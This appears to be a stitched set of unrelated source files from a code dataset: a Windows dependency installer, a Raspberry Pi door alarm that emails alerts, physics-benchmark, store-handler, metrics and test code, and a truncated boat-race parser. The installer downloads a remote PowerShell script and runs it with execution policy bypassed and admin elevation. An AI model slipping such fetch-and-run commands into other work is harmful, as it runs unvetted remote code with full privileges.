Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'));
"""

# PowerShell snippet that installs/updates WSL2 with Ubuntu as default.
install_wsl2_pwsh = """
wsl --update; wsl --shutdown; wsl --set-default-version 2; wsl --install -d Ubuntu; wsl --setdefault Ubuntu;
"""

# add this to block powershell from existing for debugging
# Read-Host -Prompt string
def make_admin_cmd(admin_cmd: str) -> str:
    """Wrap *admin_cmd* in a Start-Process invocation that elevates via UAC."""
    inner = f"Set-ExecutionPolicy Bypass -Scope Process -Force; {admin_cmd}; "
    return (
        "Start-Process PowerShell -Wait -Verb RunAs -ArgumentList "
        f'"{inner}"'
    )
def where_is(binary: str, req: Requirement) -> bool:
    """Print a progress line and report whether *binary* exists on the system."""
    print(f"{req.full_name} - {binary}", end="", flush=True)
    # Fast PATH lookup first; fall back to a full-drive scan.
    found = path_where_is(binary)
    if not found:
        found = full_where_is(binary)
    if found:
        print(" √")
    else:
        print(" ×")
    return found
def path_where_is(binary: str) -> bool:
    """Return True when where.exe finds *binary* on the PATH."""
    try:
        cmds = ["where.exe", binary]
        output = subprocess.run(cmds, capture_output=True, cwd="C:\\")
        out = str(output.stdout.decode("utf-8")).split("\r\n")
        # Only the first result line is inspected.
        if binary in out[0]:
            return True
    except Exception as e:
        # Best effort: any failure counts as "not found" so the caller
        # can try the slower full-disk fallback.
        print("error", e)
        pass
    return False
def full_where_is(binary: str) -> bool:
    """Scan all of C:\\ recursively for *binary* (slow fallback path)."""
    try:
        powershell_cmd = f"where.exe /R C:\ *.exe | findstr \\{binary}$"  # noqa: W605
        cmds = ["powershell.exe", "-Command", powershell_cmd]
        output = subprocess.run(cmds, capture_output=True, cwd="C:\\")
        out = str(output.stdout.decode("utf-8")).split("\r\n")
        if binary in out[0]:
            return True
    except Exception as e:
        # Any failure is treated as "not found".
        print("error", e)
        pass
    return False
def exe(binary: str) -> Callable:
    """Build a Requirement detector that searches the machine for *binary*."""

    def detector(req: Requirement) -> bool:
        return where_is(binary=binary, req=req)

    return detector
def detect_wsl2(req: Requirement) -> bool:
    """Detect WSL2 by parsing the output of `wsl.exe --status`."""
    print(f"{req.full_name} - wsl.exe ", end="")
    try:
        powershell_cmd = "wsl.exe --status"
        cmds = ["powershell.exe", "-Command", powershell_cmd]
        output = subprocess.run(cmds, capture_output=True)
        # wsl.exe writes UTF-16 output on Windows.
        out = output.stdout.decode("utf-16")
        if "Default Distribution: Ubuntu" in out:
            # NOTE(review): this branch is a no-op; presumably the intent
            # was to require Ubuntu before accepting the version check.
            pass
        if "Default Version: 2" in out:
            print(" √")
            return True
    except Exception as e:
        print("error", e)
        pass
    print(" ×")
    return False
# Registry of every dependency the bootstrapper knows how to detect/install.
requirements = []
requirements.append(
    Requirement(
        full_name="Windows Subsystem for Linux 2",
        choco_name="wsl2",
        detect=detect_wsl2,
    )
)
requirements.append(
    Requirement(
        full_name="Chocolatey Package Manager",
        choco_name="choco",
        detect=exe("choco.exe"),
    )
)
requirements.append(
    Requirement(
        full_name="Anaconda Individual Edition",
        choco_name="anaconda3",
        detect=exe("conda.exe"),
    )
)
requirements.append(
    Requirement(
        full_name="Git Version Control",
        choco_name="git",
        detect=exe("git.exe"),
    )
)
requirements.append(
    Requirement(
        full_name="Docker Desktop",
        choco_name="docker-desktop",
        detect=exe("docker.exe"),
    )
)
def install_elevated_powershell(full_name: str, powershell_cmd: str) -> None:
    """Run *powershell_cmd* after warning the user about the UAC prompt."""
    try:
        # Pause so the user is ready to acknowledge the UAC dialog.
        input(
            f"\nInstalling {full_name} requires Administrator.\n"
            "When the UAC dialogue appears click Yes on the left.\n\n"
            "Press enter to start..."
        )
        powershell_cmds = ["-command", powershell_cmd]
        output = subprocess.run(
            ["powershell.exe"] + powershell_cmds, capture_output=True
        )
        _ = output.stdout.decode("utf-8")
    except Exception as e:
        print("failed", e)
def install_choco() -> None:
    """Install the Chocolatey package manager via an elevated PowerShell."""
    return install_elevated_powershell(
        full_name="Chocolatey", powershell_cmd=make_admin_cmd(install_choco_pwsh)
    )
def install_wsl2() -> None:
    """Install/upgrade WSL2 with Ubuntu via an elevated PowerShell."""
    return install_elevated_powershell(
        full_name="WSL2", powershell_cmd=make_admin_cmd(install_wsl2_pwsh)
    )
def install_deps(requirements: List[Requirement]) -> None:
    """Install all given requirements in a single elevated `choco install`."""
    package_names = []
    for req in requirements:
        package_names.append(req.choco_name)
    try:
        input(
            "\nInstalling packages requires Administrator.\n"
            "When the UAC dialogue appears click Yes on the left.\n\n"
            "Press enter to start..."
        )
        # -y answers all chocolatey prompts automatically.
        choco_args = f"choco.exe install {' '.join(package_names)} -y"
        powershell_cmds = ["-command", make_admin_cmd(choco_args)]
        output = subprocess.run(
            ["powershell.exe"] + powershell_cmds, capture_output=True
        )
        _ = str(output.stdout.decode("utf-8"))
    except Exception as e:
        print("failed", e)
def ask_install(requirement: Requirement) -> bool:
    """Prompt the user; any answer containing 'y' (case-insensitive) approves."""
    answer = input(f"Do you want to install {requirement.full_name} (Y/n): ")
    return "y" in answer.lower()
def check_all(requirements: List[Requirement]) -> List[Requirement]:
    """Run every requirement's detector; return those that were not found."""
    return [req for req in requirements if not req.detect(req)]
def main() -> None:
    """Interactive flow: detect missing deps, ask, install, then re-check."""
    print("\nHAGrid Windows Dependency Installer")
    print("===================================\n")
    print("Searching your computer for:")
    missing_deps = check_all(requirements=requirements)
    if len(missing_deps) > 0:
        print("\nWe were unable to find the following dependencies:")
        print("-----------------------------------")
        for dep in missing_deps:
            print(f"{dep.full_name}")
        print("")
        desired = []
        # Chocolatey and WSL2 need dedicated installers; everything else
        # goes through one batched `choco install`.
        choco_required = False
        wsl2_required = False
        for dep in missing_deps:
            if ask_install(dep):
                if dep.choco_name == "choco":
                    choco_required = True
                elif dep.choco_name == "wsl2":
                    wsl2_required = True
                else:
                    desired.append(dep)
            elif dep.choco_name == "choco":
                # Without Chocolatey nothing else can be installed.
                print("You must install Chocolatey to install other dependencies")
                return
        if wsl2_required:
            install_wsl2()
        if choco_required:
            install_choco()
        if len(desired) > 0:
            install_deps(desired)
    print("")
    # Re-run detection on what was missing to report the final state.
    still_missing = check_all(requirements=missing_deps)
    if len(still_missing) > 0:
        print("We were still unable to find the following dependencies:")
        print("-----------------------------------")
        for dep in still_missing:
            print(f"{dep.full_name}")
        print("Please try again.")
    else:
        print("\nCongratulations. All done.")
        print("===================================\n")
        print("Now you can run HAGrid on Windows!")
# Script entry point.
if __name__ == "__main__":
    main()
| StarcoderdataPython |
1677050 | <filename>core/entities/poll.py
'''
Entity that sets the questions and manage the expiration of the survey
'''
from typing import Optional, List
from dataclasses import dataclass
from datetime import datetime
import public # type: ignore
from . import question # pylint: disable=unused-import
@public.add
@dataclass
class Poll:
    """Domain entity for a survey: a set of questions plus an expiry time.

    This is a pure domain object — it is not attached to any database ORM
    or other persistence mechanism.
    """

    parent: Optional['Poll']
    expires_at: datetime
    questions: List['question.Question']

    def has_expired(self) -> bool:
        """Return True once the current time has passed ``expires_at``."""
        return datetime.now() > self.expires_at
| StarcoderdataPython |
3248739 | <gh_stars>1-10
# coding: utf-8
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
# Command line :
# python -m benchmark.HIGGS.explore.tau_effect
import os
import datetime
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from config import SAVING_DIR
from config import SEED
from visual import set_plot_config
set_plot_config()
from problem.higgs.higgs_geant import load_data
from problem.higgs.higgs_geant import split_data_label_weights
from problem.higgs import get_parameter_class
from problem.higgs import get_higgsnll_class
from problem.higgs import get_config_class
from problem.higgs import get_generator_class
from problem.higgs import get_higgsloss_class
from problem.higgs import get_parameter_generator
# Systematic-uncertainty switches: only the tau-energy scale (TES) is active.
TES = True
JES = False
LES = False

# Resolve the problem classes matching the chosen nuisance parameters.
Parameter = get_parameter_class(TES, JES, LES)
NLLComputer = get_higgsnll_class(TES, JES, LES)
Config = get_config_class(TES, JES, LES)
GeneratorClass = get_generator_class(TES, JES, LES)
HiggsLoss = get_higgsloss_class(TES, JES, LES)
param_generator = get_parameter_generator(TES, JES, LES)

DATA_NAME = 'HIGGS'
BENCHMARK_NAME = DATA_NAME
# All exploration outputs land under this directory.
DIRECTORY = os.path.join(SAVING_DIR, BENCHMARK_NAME, "explore")
def main():
    """Entry point: load the HIGGS GEANT data and run the TES mini-batch study."""
    print('Hello world')
    # Ensure the output directories exist before anything is written.
    os.makedirs(DIRECTORY, exist_ok=True)
    data = load_data()
    generator = GeneratorClass(data, seed=2)
    dirname = os.path.join(DIRECTORY, 'tes_minibatch')
    os.makedirs(dirname, exist_ok=True)
    minibatchsize(generator, dirname=dirname)
def minibatchsize(generator, dirname=DIRECTORY):
    """Compare the weighted mean tau pT for nominal and ±DELTA TES shifts.

    The generator is reset before the second and third scans so all three
    parameter points run over the same sequence of events, exactly as the
    original nominal/up/down sequence did.

    Args:
        generator: event generator providing generate()/reset().
        dirname: output directory (currently unused, kept for the caller).
    """
    DELTA = 0.03
    config = Config()
    nominal_param = config.CALIBRATED  # .clone_with(mu=0.5)
    up_param = nominal_param.clone_with(tes=nominal_param.tes + DELTA)
    down_param = nominal_param.clone_with(tes=nominal_param.tes - DELTA)
    # (An unused timestamp variable from the original was removed, and the
    # triplicated scan/print code collapsed into one loop.)
    for index, param in enumerate((nominal_param, up_param, down_param)):
        if index:
            generator.reset()
        mean_values = get_mean_pri_tau_pt_means(generator, param)
        for k, v in mean_values.items():
            print(f'{k} : {np.mean(v)} +/- {np.std(v)}')
def get_mean_pri_tau_pt_means(generator, param):
    """For each sample size, draw N_SAMPLES batches and collect the
    weighted mean of the pri_tau_pt feature (column 12) per batch.

    Returns:
        dict mapping sample_size -> list of per-batch weighted means.
    """
    print(param, *param)
    N_SAMPLES = 50
    # Batch sizes from 10k to 90k events in 10k steps.
    SAMPLE_SIZE = np.arange(10_000, 100_000, 10_000)
    pri_tau_pt_idx = 12
    print(generator.feature_names[pri_tau_pt_idx])
    mean_values = {}
    for sample_size in SAMPLE_SIZE:
        print(f'processing with {sample_size} events ...')
        mean_values[sample_size] = []
        for i in range(N_SAMPLES):
            # Labels y are unused here; only features X and weights w matter.
            X, y, w = generator.generate(*param, n_samples=sample_size, no_grad=True)
            pri_tau_pt = X[:, pri_tau_pt_idx]
            # Event-weighted mean of the feature over the batch.
            pri_tau_pt_mean = (pri_tau_pt * w).sum() / w.sum()
            mean_values[sample_size].append( pri_tau_pt_mean.detach().numpy() )
    return mean_values
# Script entry point.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
3522397 | #!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
""" StoreRecordHandler class
This class was call when store consumer receive an new StoreRecord event and store msg in local & global store
"""
from tonga.models.store.base import BaseStoreRecordHandler
from tonga.models.store.store_record import StoreRecord
from tonga.stores.manager.base import BaseStoreManager
from tonga.models.structs.store_record_type import StoreRecordType
from tonga.models.structs.positioning import BasePositioning
# Import StoreRecordHandler exceptions
from tonga.models.store.errors import (UnknownStoreRecordType)
__all__ = [
'StoreRecordHandler'
]
class StoreRecordHandler(BaseStoreRecordHandler):
    """ StoreRecordHandler Class

    Applies incoming StoreRecord events to the local or global store and
    then advances the store metadata position.

    Attributes:
        _store_manager (BaseStoreManager): Store manager used to build and
            maintain the local & global stores
    """
    _store_manager: BaseStoreManager

    def __init__(self, store_manager: BaseStoreManager) -> None:
        """ StoreRecordHandler constructor

        Args:
            store_manager (BaseStoreManager): Store manager used to build
                and maintain the local & global stores

        Returns:
            None
        """
        super().__init__()
        self._store_manager = store_manager

    @classmethod
    def handler_name(cls) -> str:
        """ Return the store record handler name, used by the serializer

        Returns:
            str: StoreRecordHandler name
        """
        return 'tonga.store.record'

    async def _apply_record(self, store_record: StoreRecord, set_coro, delete_coro) -> None:
        """ Apply one StoreRecord via the given set/delete coroutines.

        Shared dispatch for the local and global handlers below.

        Args:
            store_record (StoreRecord): record to apply
            set_coro: awaited as ``set_coro(key, value)`` for 'set' records
            delete_coro: awaited as ``delete_coro(key)`` for 'del' records

        Raises:
            UnknownStoreRecordType: when the operation type is neither
                'set' nor 'del'

        Returns:
            None
        """
        if store_record.operation_type == StoreRecordType('set'):
            await set_coro(store_record.key, store_record.value)
        elif store_record.operation_type == StoreRecordType('del'):
            await delete_coro(store_record.key)
        else:
            raise UnknownStoreRecordType

    async def local_store_handler(self, store_record: StoreRecord, positioning: BasePositioning) -> None:
        """ Automatically called by Tonga when a StoreRecord for the local
        store is received by the consumer. Used to (re)build the local store.

        Args:
            store_record (StoreRecord): StoreRecord event received by the consumer
            positioning (BasePositioning): Contains topic / partition / offset

        Raises:
            UnknownStoreRecordType: when the record's operation type is unknown

        Returns:
            None
        """
        await self._apply_record(store_record,
                                 self._store_manager.set_from_local_store_rebuild,
                                 self._store_manager.delete_from_local_store_rebuild)
        # Advance the consumed offset and persist it in the local store metadata.
        positioning.set_current_offset(positioning.get_current_offset() + 1)
        await self._store_manager.update_metadata_from_local_store(positioning)

    async def global_store_handler(self, store_record: StoreRecord, positioning: BasePositioning) -> None:
        """ Automatically called by Tonga when a StoreRecord for the global
        store is received by the consumer. Used to build the global store.

        Args:
            store_record (StoreRecord): StoreRecord event received by the consumer
            positioning (BasePositioning): Contains topic / partition / offset

        Raises:
            UnknownStoreRecordType: when the record's operation type is unknown

        Returns:
            None
        """
        await self._apply_record(store_record,
                                 self._store_manager.set_from_global_store,
                                 self._store_manager.delete_from_global_store)
        # Advance the consumed offset and persist it in the global store metadata.
        positioning.set_current_offset(positioning.get_current_offset() + 1)
        await self._store_manager.update_metadata_from_global_store(positioning)
306219 | __author__ = 'achamseddine'
import os
import csv
import time
import json
def _print_paragraph_symbols(paragraph):
    # Print the paragraph's text followed by the attribute values of every
    # w:sym element it contains (symbol glyphs used as checkboxes in the form).
    print(paragraph.text)
    for sym in paragraph._element.xpath('.//w:sym'):
        print(sym.values())


def read_docx():
    """Open the HACT assessment .docx next to this script and print the
    checkbox symbols of paragraphs 7 and 8 in table 1, row 6, cell 0, plus
    the text of row 19, cell 0.

    Improvements over the original: the document is loaded once (it was
    loaded twice), a no-op paragraph scan and large blocks of commented-out
    debug prints were removed.
    """
    from docx import Document

    base_dir = os.path.dirname(os.path.abspath(__file__))
    path2file = os.path.join(base_dir, 'HACT_TDH-it_Arsal_Center_100419.docx')
    document = Document(path2file)

    cell = document.tables[1].rows[6].cells[0]
    _print_paragraph_symbols(cell.paragraphs[7])
    _print_paragraph_symbols(cell.paragraphs[8])
    print(document.tables[1].rows[19].cells[0].paragraphs[0].text)
| StarcoderdataPython |
3451304 | import RPi.GPIO as GPIO
import time
import smtplib
import thread
import cred
import imaplib
import email
import os
from PCF8574 import PCF8574_GPIO
from Adafruit_LCD1602 import Adafruit_CharLCD
try:
    # Set to True once GPIO pins are configured, so the cleanup code at the
    # bottom of the file knows whether GPIO.cleanup() is still needed.
    need_clean = False
    # Message templates for door notifications.
    # NOTE(review): MSG appears unused below; only DOOR_MSG is consumed — confirm.
    MSG = '\nDoor was '
    DOOR_MSG = {True:'opened', False:'closed'}
    # Helper that sends a notification message via SMTP (see send_msg below).
def send_msg(message):
print('send msg function')
print('initiating server')
server = smtplib.SMTP( cred.SMTPHOST, 587 )
print('starting tls')
server.starttls()
server.login( cred.FROM, cred.PASS )
print('sending message...')
server.sendmail(cred.FROM, cred.TO, message)
print('message sent!')
server.quit()
    def read_msg(nothing):
        """Poll the IMAP inbox for command replies.

        Downloads attachments of every message from the expected sender,
        reads the first line of each, and reacts to 'off' (silence the
        buzzer, restart monitoring) or 'stop' (deactivate and exit the
        process). Every scanned message is deleted afterwards.

        The 'nothing' argument is unused; it only satisfies the
        thread.start_new_thread tuple-args calling convention.
        """
        # Connect to the IMAP host using SSL and select the inbox.
        mail = imaplib.IMAP4_SSL(cred.IMAPHOST,993)
        mail.login(cred.FROM, cred.PASS)
        mail.select('Inbox')
        # NOTE(review): 'type' shadows the builtin; result status is unchecked.
        type, data = mail.search(None, '(FROM "<EMAIL>")')
        mail_ids = data[0]  # NOTE(review): unused — data[0] is split directly below.
        off = 0
        stop = 0
        for num in data[0].split():
            typ, data = mail.fetch(num, '(RFC822)' )
            raw_email = data[0][1]# raw RFC822 bytes of the message
            raw_email_string = raw_email.decode('utf-8')
            email_message = email.message_from_string(raw_email_string)# parse, then walk parts for attachments
            for part in email_message.walk():
                fileName = part.get_filename()
                if bool(fileName):
                    filePath = os.path.join('/home/pi/', fileName)
                    if not os.path.isfile(filePath) :
                        # Write the attachment to disk, read its first line
                        # as the command text, then remove the temp file.
                        fp = open(filePath, 'wb')
                        fp.write(part.get_payload(decode=True))
                        fp.close()
                        f = open(filePath, "r")
                        text = f.readline()
                        f.close()
                        os.remove(filePath)
                        # Normalise: strip dots and spaces, lowercase.
                        text = text.replace(".", "")
                        text = text.replace(" ", "")
                        text = text.lower()
                        if text == 'off':
                            off = 1
                        elif text == 'stop':
                            stop = 1
                        else:
                            print('Not stopped')
                            send_msg("\nError: please type 'Stop'")
            mail.store(num, '+FLAGS', '\\Deleted') # mark the scanned email deleted
        # Purge deleted messages and close the mailbox.
        mail.expunge()
        mail.close()
        if off == 1:
            # 'off': silence the buzzer and resume monitoring.
            GPIO.output(buzz,GPIO.LOW)
            print('Sucessfully Restarted')
            lcd.setCursor(0,0)
            lcd.message('Alarm was restarted')
            send_msg("\nAlarm restarted")
        if stop == 1:
            # 'stop': silence the buzzer and terminate the whole process.
            GPIO.output(buzz,GPIO.LOW)
            print('Successfully stopped')
            send_msg("\nAlarm Deactivated")
            lcd.clear()
            os._exit(0)
    def while_read(nothing):
        """Poll the inbox every 10 seconds by spawning read_msg in a new
        thread. The 'nothing' argument only satisfies the
        thread.start_new_thread calling convention.
        """
        while True:
            time.sleep(10)
            thread.start_new_thread(read_msg,("",))
    # ---- Hardware setup (BOARD pin numbering) ----
    print('Setting up hardware...')
    PIN = 36   # door-sensor input (pull-up enabled)
    buzz = 38  # buzzer output
    GPIO.setmode(GPIO.BOARD)
    GPIO.setup(PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
    GPIO.setup(buzz, GPIO.OUT)
    # Sensor level we are waiting for next; True means "door opened" next.
    next_state = True
    need_clean = True
    PCF8574_address = 0x27  # I2C address of the PCF8574 chip.
    PCF8574A_address = 0x3F  # I2C address of the PCF8574A chip.
    # Create the PCF8574 GPIO adapter, falling back to the PCF8574A address.
    try:
        mcp = PCF8574_GPIO(PCF8574_address)
    except:
        try:
            mcp = PCF8574_GPIO(PCF8574A_address)
        except:
            print ('I2C Address Error !')
            exit(1)
    # Create LCD, passing in MCP GPIO adapter.
    lcd = Adafruit_CharLCD(pin_rs=0, pin_e=2, pins_db=[4,5,6,7], GPIO=mcp)
    # ---- Run the alarm ----
    print('Ready!')
    mcp.output(3,1) # turn on LCD backlight
    lcd.begin(16,2) # set number of LCD lines and columns
    # Announce activation without blocking the main loop.
    thread.start_new_thread(send_msg, ("\nAlarm Activated\n\nType 'stop' to stop deactivate it",))
    off = 0  # NOTE(review): appears unused here (read_msg has its own) — confirm.
    # Spawn the inbox poller that handles 'off'/'stop' replies.
    thread.start_new_thread(while_read,("",))
    while True:
        # Fires when the sensor reaches the level we are waiting for.
        if GPIO.input(PIN) == next_state:
            doorTime = time.strftime('%I:%M:%S %p')
            message = "Door was " + DOOR_MSG[next_state] + "\n\nType 'off' to restart alarm"
            lcd.setCursor(0,0)
            lcd.message(message + '\n at ' + doorTime)
            print(message)
            GPIO.output(buzz,GPIO.HIGH)
            # Send the notification on a separate thread.
            thread.start_new_thread(send_msg, ("\n" + message,))
            # Wait for the opposite transition (open <-> close) next time.
            next_state = not next_state
            time.sleep(0.3)
except KeyboardInterrupt:
    # Ctrl-C: silence the buzzer and release the hardware immediately.
    print('KeyboardInterrupt')
    GPIO.output(buzz,GPIO.LOW)
    GPIO.cleanup()
    lcd.clear()
    need_clean = False
# Clean up the hardware if the try block exited without doing it itself.
if need_clean:
    lcd.clear()
    GPIO.cleanup() #For normal exit
print('\nEnd!')
| StarcoderdataPython |
11329454 | from django.core.management.base import BaseCommand
from ...data_integrity_checks import ObservationDataChecks
class Command(BaseCommand):
    """Management command that reports observation-data integrity problems."""

    help = 'Check observation data.'

    def add_arguments(self, parser):
        # This check takes no command-line options.
        pass

    def handle(self, *args, **options):
        checks = ObservationDataChecks()
        print("***** Observations without a suborder *****")
        for orphan in checks.find_observations_without_suborder():
            print(orphan)
| StarcoderdataPython |
9734532 | <filename>test5.py
#!/usr/bin/env python
#some _string
~
#
| StarcoderdataPython |
3257427 | <reponame>leonell147/oci-swarm-cluster
import abc
import datetime
from typing import Dict, Any
from actions.procesamiento.tarea import Tarea
from actions.procesamiento.fase import Fase
class CalculationStrategy(metaclass=abc.ABCMeta):
    """Interface defining the basic behaviour required by a strategy
    used to compute metrics.
    """

    @abc.abstractmethod
    def process_event(self, event: Dict) -> None:
        """Process one incoming event.

        :param event: event to process.
        :return: None.
        """
        raise NotImplementedError

    @abc.abstractmethod
    def calculate_value(self) -> Any:
        """Compute and return the strategy's current value.

        :return: Any.
        """
        raise NotImplementedError

    @abc.abstractmethod
    def get_name(self) -> str:
        """Return the strategy's display name.

        :return: str.
        """
        raise NotImplementedError
class MeetingParticipations(CalculationStrategy):
    """Counts the participations of every TeamMember/AgileBot in an
    AgileTalk project meeting and renders them as a summary string
    (in Spanish, as consumed by the rest of the system).
    """

    def __init__(self):
        # Occurrence counter; only __str__ reads it.
        self._n_occurrences = 0
        # NOTE(review): never read anywhere; kept for backward compatibility.
        self._d_ocurrences = {}
        # Human-readable summary, rebuilt on every process_event() call.
        self.result = ""

    def __str__(self) -> str:
        return "(MeetingParticipations: {})".format(self._n_occurrences)

    def get_name(self) -> str:
        return "MeetingParticipations"

    def process_event(self, event: Dict) -> None:
        """Build the per-member participation summary from an event.

        Expected event format::

            {'Participations': [{'1': {'cant_particip': '3'}},
                                {'2': {'cant_particip': '2'}}]}

        :param event: event to process.
        :return: None.
        """
        # Collect fragments and join once: avoids the quadratic cost of
        # repeated string concatenation in the original implementation.
        fragments = []
        for entry in event["Participations"]:
            for member_id, info in entry.items():
                fragments.append(
                    "El miembro del equipo " + str(member_id)
                    + " participó " + str(info["cant_particip"])
                    + " veces en la reunión. ")
        self.result = "".join(fragments)

    def calculate_value(self) -> str:
        """Return the meeting-participation summary for the project.

        :return: str.
        """
        return self.result
class MeetAsistance(CalculationStrategy):
    """Computes the fraction of expected participants who actually took
    part in a meeting (attendance percentage, in [0, 1])."""

    def __init__(self):
        # Attendance ratio computed by the last processed event.
        self._n_asistance = 0

    def __str__(self) -> str:
        return "(MeetAsistance: {})".format(self._n_asistance)

    def get_name(self) -> str:
        return "MeetAsistance"

    def process_event(self, event: Dict) -> None:
        """Update the attendance ratio from a meeting event.

        Expected event format::

            {"event_id": "", "time": "", "id_reunion": "",
             "participaciones": {"bruno": 5, "matias": 7}}

        Members who must attend but did not appear should still be listed
        with zero participations, otherwise they are not counted.

        :param event: event to process.
        :return: None.
        """
        participations = event["participaciones"]
        attendees = sum(1 for count in participations.values() if count > 0)
        if participations:
            self._n_asistance = attendees / len(participations)

    def calculate_value(self) -> float:
        """Return the attendance ratio of the meeting.

        :return: float.
        """
        return self._n_asistance
class EstimatedDeadline(CalculationStrategy):
    """Compares the estimated completion deadline of a phase against its
    real completion time.

    NOTE(review): the original docstring described meeting attendance —
    it was copy-pasted from MeetAsistance.
    """

    def __init__(self): # The Fase should come from an artefact-providing component
        """Constructor: builds a placeholder 15-minute phase until a real
        one is provided by the artefact component."""
        self.fecha_init= datetime.datetime.utcnow()
        self.fecha_fin= datetime.datetime.utcnow() + datetime.timedelta(minutes=15)
        self._fase = Fase(1, self.fecha_init.strftime("%Y-%m-%d %H:%M:%S"), self.fecha_fin.strftime("%Y-%m-%d %H:%M:%S"))
        # NOTE(review): the same actor id is added three times — confirm intent.
        self._fase.add_actor("actor1")
        self._fase.add_actor("actor1")
        self._fase.add_actor("actor1")
        # Both start as today's date; replaced by timedeltas in process_event.
        self._estimated_time = datetime.date.today()
        self._real_time = datetime.date.today()

    def __str__(self) -> str:
        return " "

    def get_name(self) -> str:
        return "EstimatedDeadline"

    def process_event(self, event: dict) -> None:
        """Handle a "FinFase" (phase-finished) event: compute the estimated
        and the real phase duration as timedeltas.

        :param event: event with keys "id", "fecha_start", "fecha_ended"
            (dates formatted as "%Y-%m-%d %H:%M:%S").
        :return: None.
        """
        # NOTE(review): 'd' documents the expected event shape but is unused.
        d={"id":1,"fecha_start":"fecha","fecha_ended":"fecha"}
        date_format = "%Y-%m-%d %H:%M:%S"
        self._fase.set_id(event["id"])
        self._fase.finalizar()
        #real_end_date=self._fase.get_fecha_fin()
        end_date = datetime.datetime.strptime(
            str(self._fase.get_duracion_estimada()), date_format)
        start_date = datetime.datetime.strptime(
            str(self._fase.get_fecha_inicio()), date_format)
        real_end_date=datetime.datetime.strptime(
            str(event["fecha_ended"]), date_format)
        real_start_date=datetime.datetime.strptime(
            str(event["fecha_start"]), date_format)
        self._estimated_time = end_date - start_date
        self._real_time = real_end_date - real_start_date

    def calculate_value(self) -> int:
        """Return the difference in seconds between the real and the
        estimated duration.

        Negative -> finished earlier than estimated;
        positive -> finished later than estimated.

        NOTE(review): this mutates _real_time/_estimated_time to floats, so
        calling it twice without a new event raises AttributeError — confirm.

        :return: int.
        """
        self._real_time = self._real_time.total_seconds()
        self._estimated_time = self._estimated_time.total_seconds()
        difference_sec = self._real_time - self._estimated_time
        return difference_sec
class ControlTask(CalculationStrategy):
    """Summarises task progress: for each task, the hours still needed to
    finish it, plus the total hours the team member worked.

    (The original docstring wrongly described meeting attendance; it was
    copy-pasted from MeetAsistance.)
    """

    def __init__(self):
        self._n_asistance = 0
        # NOTE(review): legacy attributes; nothing reads them any more.
        self.tareas = []
        self.result = {}
        # Summary string and worked-hours counter, rebuilt on every event.
        self.valor = ""
        self.horashechas = 0

    def __str__(self) -> str:
        return "(ControlTask: {})".format(self._n_asistance)

    def get_name(self) -> str:
        return "ControlTask"

    def process_event(self, event: dict) -> None:
        """Process a task-progress event.

        Expected event format::

            {"Tareas": [{"1": {"horas_totales": "8", "horas_trabajadas": "5"}}]}

        :param event: event to process.
        :return: None.
        """
        print(event)  # debug trace kept from the original implementation
        fragments = []
        worked_hours = 0
        for task_entry in event["Tareas"]:
            for task_id, info in task_entry.items():
                remaining = int(info["horas_totales"]) - int(info["horas_trabajadas"])
                fragments.append("La tarea " + str(task_id) + " necesita "
                                 + str(remaining) + " hora/s más para ser finalizada. ")
                worked_hours += int(info["horas_trabajadas"])
        # Join once instead of concatenating inside the loop.
        self.valor = "".join(fragments)
        self.horashechas = worked_hours

    def calculate_value(self) -> str:
        """Return the task summary plus the daily worked-hours sentence.

        :return: str.
        """
        resultado = self.valor + " El miembro del equipo trabajó " + str(self.horashechas) + " horas diarias."
        return resultado
5012388 | import pytest
from ferret.extractors.content_extractor import ContentExtractor
def _get_contents_of(file_path):
try:
with open(file_path) as file:
return file.read()
except IOError:
return None
@pytest.mark.parametrize("language,website_acronym", [
    ("pt", "r7"),
    ("pt", "terra"),
])
def test_content_extractor(language, website_acronym):
    """End-to-end check: content extracted from a saved page fixture must
    match the stored expected-content fixture for each (language, site)."""
    html_file_path = "tests/resources/{}/{}/page.html".format(language, website_acronym)
    html = _get_contents_of(html_file_path)

    expected_content_file_path = "tests/resources/{}/{}/content.html".format(language, website_acronym)
    expected_content = _get_contents_of(expected_content_file_path)

    extractor = ContentExtractor(html)
    extracted_content = extractor.extract()
    # Printed so a failing run shows the actual extraction in the output.
    print(extracted_content)

    assert extracted_content == expected_content
| StarcoderdataPython |
9733007 | '''
【システム】BOAT_RACE_DB2
【ファイル】140_mkcsv_t_info_h.py
【機能仕様】直前情報HTMLファイルからレース情報タイトルテーブル「t_info_h」のインポートCSVファイルを作成する
【動作環境】macOS 11.1/Raspbian OS 10.4/python 3.9.1/sqlite3 3.32.3
【来 歴】2021.02.01 ver 1.00
'''
import os
import datetime
from bs4 import BeautifulSoup
#インストールディレクトの定義
BASE_DIR = '/home/pi/BOAT_RACE_DB'
'''
【関 数】mkcsv_t_info_h
【機 能】直前HTMLファイルから直前情報ヘッダテーブル「t_info_h」のインポートCSVファイルを作成する
【引 数】なし
【戻り値】なし
'''
def _nth_label_data(soup, n, unit):
    """Return the text of the n-th 'weather1_bodyUnitLabelData' span,
    stripped of its closing tag and of the given unit suffix.
    Returns '' when fewer than n matching spans exist."""
    count = 0
    for tag in soup.find_all('span'):
        if 'weather1_bodyUnitLabelData' in str(tag):
            count += 1
            if count == n:
                value = str(tag).split('>')[1]
                value = value.replace('</span', '')
                return value.replace(unit, '')
    return ''


def _weather_label(soup):
    """Return the weather-condition text, taken from the second
    'weather1_bodyUnitLabelTitle' span. Returns '' when absent."""
    count = 0
    for tag in soup.find_all('span'):
        if 'weather1_bodyUnitLabelTitle' in str(tag):
            count += 1
            if count == 2:
                value = str(tag).split('>')[1]
                return value.replace('</span', '')
    return ''


# Mapping from the 'is-windN' CSS class number to the wind-direction label.
# (Replaces the original 17-branch if/elif chain.)
_WIND_DIRECTIONS = {
    1: '左直', 2: '追左', 3: '追左', 4: '追左', 5: '追直',
    6: '追右', 7: '追右', 8: '追右', 9: '右直', 10: '向左',
    11: '向左', 12: '向左', 13: '向直', 14: '無風', 15: '向右',
    16: '向右', 17: '無風',
}


def _wind_direction(soup):
    """Return the wind-direction label derived from the first <p> tag that
    carries a 'weather1_bodyUnitImage is-windN' class; '不明' when no
    known class number matches."""
    for tag in soup.find_all('p'):
        tag_html = str(tag)
